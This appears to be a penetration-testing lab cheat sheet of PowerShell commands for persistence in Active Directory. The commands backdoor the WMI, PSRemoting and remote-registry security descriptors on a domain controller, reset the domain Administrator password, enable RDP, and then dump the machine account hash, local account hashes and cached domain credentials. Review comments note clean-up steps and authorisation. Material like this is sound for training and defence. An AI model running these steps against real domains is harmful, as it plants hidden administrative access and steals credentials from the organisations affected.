Persistence ACLs - Security Descriptors

  • Need DA (in practice: administrative rights on the target machine, which a Domain Admin has on the DC). The changes below are persistent security-descriptor modifications on the target — record them so they can be reverted at the end of the engagement.

Security Descriptors

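#Need DA (administrative rights on the target) to rewrite its WMI / PSRemoting security descriptors.
#Import both helpers as script files; the original first line omitted the .ps1 extension and
#a module named "Set-RemoteWMI" would not resolve from PSModulePath. Adjust the path as needed.
Import-Module .\Set-RemoteWMI.ps1
Import-Module .\Set-RemotePSRemoting.ps1

#On Local Machine for Student529 or your current user
Set-RemoteWMI -UserName student529 -Verbose


#On Remote Machine without Credentials (the current DA token is used).
#-Verbose is passed exactly once: specifying the same parameter twice makes PowerShell
#refuse to bind the command, so the original duplicated switch would have failed.
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -ComputerName dcorp-dc -Verbose


#On Remote Machine WITH explicit Credentials (the original comment said "without").
#-Credential with a bare user name prompts for the password; prefer the domain-qualified form.
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -Credential dcorp\Administrator -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -ComputerName dcorp-dc -Credential dcorp\Administrator -Verbose

#On Remote Machine remove permissions (clean-up). The original line read 'dcorp-dc–namespace'
#with an en dash and no space, which glued the namespace switch onto the computer name.
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
#NOTE(review): no removal for the PSRemoting descriptor is shown here; check the script for a
#matching removal option and revert that change as well during clean-up.


#verify that we have access and can execute command with WMI
#Open Powershell with student529 non-admin user
Get-WmiObject -Class Win32_OperatingSystem -ComputerName dcorp-dc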


----------Abuse WMI / PSRemoting access-----
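#If we executed Set-RemotePSRemoting.ps1, we can now use Invoke-Command as the non-admin user:
#Open Powershell with student529 non-admin user
Invoke-Command -ScriptBlock {whoami /priv} -ComputerName dcorp-dc

#Reset the domain Administrator password with PowerView.
#WARNING: this is destructive (locks the legitimate owner out) and highly visible; it is a lab
#exercise, not something to run on a real engagement without explicit authorisation.
#NOTE(review): a password reset presumably requires reset-password rights on the Administrator
#object — the WMI/PSRemoting descriptor changes above do not by themselves grant AD rights; confirm
#how that right was obtained before relying on this step.
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@1234" -AsPlainText -Force) -Verbose


#Enter Session with new password (prompts for the credential; ASCII hyphens instead of the
#original en dashes so the line copies cleanly into any shell)
Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\Administrator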


----------#Extra-------
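#Enable Remote Desktop (needs admin on the host; the registry and firewall changes persist and are
#easy to spot, so note them for clean-up). The original line had no space before -name, so the
#parameter would not have bound correctly.
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
#Activate the firewall rule group for RDP
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Require Network Level Authentication (NLA) for RDP: UserAuthentication = 1 means the client must
#authenticate before a session is created (this hardens RDP; it does not "enable" authentication)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1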

Security Descriptors - Remote Registry

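#Need DA (administrative rights on the target machine are what the remote-registry descriptor change requires)
Import-Module C:\AD\Tools\DAMP-master\DAMP-master\Add-RemoteRegBackdoor.ps1



#Using DAMP, with admin privs on remote machine: backdoors the remote registry security descriptors
#so the trustee (student529) can later read the secrets retrieved below. This is a persistent ACL
#change on the DC — record it and revert it during clean-up.
#NOTE(review): the later retrieval commands talk to the remote registry, so the Remote Registry
#service on the target must be reachable — confirm in the lab.
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student529 -Verbose


#As student529, retrieve machine account hash:
#Open Powershell with student529 non-admin user
#if we get an error, open RemoteHashRetrieval.ps1 and
#replace $IV with $initV, save RemoteHashRetrieval.ps1 and run it again
Import-Module C:\AD\Tools\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
#Treat every hash returned by these commands as a live credential: do not paste it into
#shared notes or ticketing systems.


#Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose


#Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose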
